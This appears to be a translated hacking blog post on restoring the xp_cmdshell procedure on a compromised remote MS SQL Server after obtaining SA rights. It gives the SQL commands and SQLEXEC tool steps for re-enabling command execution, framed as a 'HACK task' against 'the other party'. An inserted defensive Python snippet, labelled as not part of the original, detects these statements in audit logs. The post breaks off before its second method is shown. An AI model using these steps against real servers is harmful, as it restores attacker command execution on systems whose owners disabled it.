Recently, when I needed to use these things, I found I was a bit unclear on them, though there is really nothing to it. So I have to summarize it on my own blog. The process of using SQLEXEC to add an administrator is not covered here.
Prerequisites. Required tools: SQL Query Analyzer and SQLEXEC Sunx Version
Part one:
Analysis and summary of removing xp_cmdshell:
First, the statements to know:
1. To remove the xp_cmdshell extended stored procedure, use the following statement:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2. To add the xp_cmdshell extended stored procedure, use the following statement:
sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
Now look at the symptom:
After obtaining SA permissions, if executing a remote command with SQLEXEC returns SQL_ERROR, xp_cmdshell has most likely been removed.
Now let's look at two ways to restore xp_cmdshell after it has been removed:
Method 1. Use SQL Query Analyzer to connect to the other party directly, which is very convenient:
sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
Method 2. Use SQLEXEC Sunx Version.
First enter %s in the Format option of SQLEXEC Sunx Version, then enter the following in the CMD option:
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Or, in the case of SQL2000, use:
sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
SQLEXEC Sunx Version can also be used to remove xp_cmdshell.
Select the conditions as follows, then enter:
sp_dropextendedproc 'xp_cmdshell'
and that's it.
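Seen from the defending side, the statements in part one are exactly what to look for in SQL trace or audit output. The following is an added example, not part of the original post: the names `scan` and `KNOWN_DLLS` are hypothetical, the sample batches are constructed, and it assumes the executed batch text is available as plain strings.

```python
import re

# DLL names the post gives for xp_cmdshell (SQL 7.0 and SQL 2000).
KNOWN_DLLS = {"xplog70.dll", "xpsql70.dll"}

_STR = r"N?\s*'\s*([^']*?)\s*'"                      # '...' or N'...'
_PART = r"(?:\[[^\]]*\]|\w+)"                        # [dbo] or dbo
_BARE = r"(" + _PART + r"(?:\s*\.\s*" + _PART + r")*)"
_CALL = re.compile(
    r"\b(sp_addextendedproc|sp_dropextendedproc)\b\s*"
    r"(?:@\s*functname\s*=\s*)?(?:" + _STR + r"|" + _BARE + r")"
    r"(?:\s*,\s*(?:@\s*dllname\s*=\s*)?" + _STR + r")?",
    re.IGNORECASE,
)

def _object_name(text):
    """Reduce "[dbo]. [ XP_cmdshell]" or "XP_cmdshell" to "xp_cmdshell"."""
    return text.split(".")[-1].strip(" \t[]").lower()

def scan(statement):
    """Return one finding per add/drop of the xp_cmdshell extended procedure."""
    findings = []
    for m in _CALL.finditer(statement):
        proc, quoted, bare, dll = m.groups()
        if _object_name(quoted if quoted is not None else bare) != "xp_cmdshell":
            continue  # some other extended procedure
        dll = dll.lower() if dll else None
        findings.append({
            "action": "register" if proc.lower() == "sp_addextendedproc" else "drop",
            "dll": dll,
            # A DLL other than the ones named in the post deserves a closer look.
            "unexpected_dll": dll is not None and dll not in KNOWN_DLLS,
        })
    return findings

# Constructed sample batches, as they might appear in trace or audit output.
SAMPLES = [
    "sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'",
    "exec sp_dropextendedproc N' [dbo]. [ XP_cmdshell] '",
    "Sp_addextendedProc 'XP_cmdshell', 'other.dll'",
    "select name from sysobjects where xtype = 'X'",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(scan(s), "<-", s)
```

A drop followed shortly by a register from the same login, or any register with `unexpected_dll` set, is the pattern worth alerting on.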
Part two:
If the other party has removed xplog70.dll or changed its name, let's continue our HACK task with the following method:
The following symptom suggests that xplog70.dll has been deleted or renamed.
Enter in the query analyzer:
sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
It prompts:
There is already an object named 'xp_cmdshell' in the database.
So how do we recover?
In fact, following the method provided by the master LCX, we can do it by writing a script in the query analyzer.